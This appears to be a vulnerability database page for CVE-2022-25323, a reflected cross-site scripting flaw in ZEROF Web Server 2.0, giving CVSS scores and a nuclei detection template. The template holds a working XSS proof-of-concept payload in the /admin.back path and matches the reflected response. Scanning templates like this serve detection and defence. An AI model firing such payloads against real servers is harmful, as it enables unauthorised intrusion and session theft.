Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-25323
HistoryFeb 19, 2022 - 10:32 p.m.

ZEROF Web Server 2.0 - Cross-Site Scripting

2022-02-1922:32:01
ProjectDiscovery
github.com
2

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.4%

ZEROF Web Server 2.0 allows /admin.back cross-site scripting.

id: CVE-2022-25323

info:
  name: ZEROF Web Server 2.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix the XSS vulnerability in ZEROF Web Server 2.0.
  reference:
    - https://github.com/awillix/research/blob/main/cve/CVE-2022-25323.md
    - https://nvd.nist.gov/vuln/detail/CVE-2022-25323
    - https://awillix.ru
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/awillix/research
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-25323
    cwe-id: CWE-79
    epss-score: 0.00115
    epss-percentile: 0.45082
    cpe: cpe:2.3:a:zerof:web_server:2.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zerof
    product: web_server
    shodan-query: cpe:"cpe:2.3:a:google:web_server"
  tags: cve,cve2022,xss,zerof

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin.back<img%20src=x%20onerror=alert(document.domain)>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'back<img src=x onerror=alert(document.domain)>'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 401
# digest: 4a0a00473045022100b1f93640c8017dbc21a9a6aeaf34bd035e2d2d6292c09cb51f9030dcba2fc74b02200e74afbec04cafcb321f4846debadbb1808f5ef0e484f7fca55e2960f8d5c3ed:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.001 Low

EPSS

Percentile

45.4%

Related for NUCLEI:CVE-2022-25323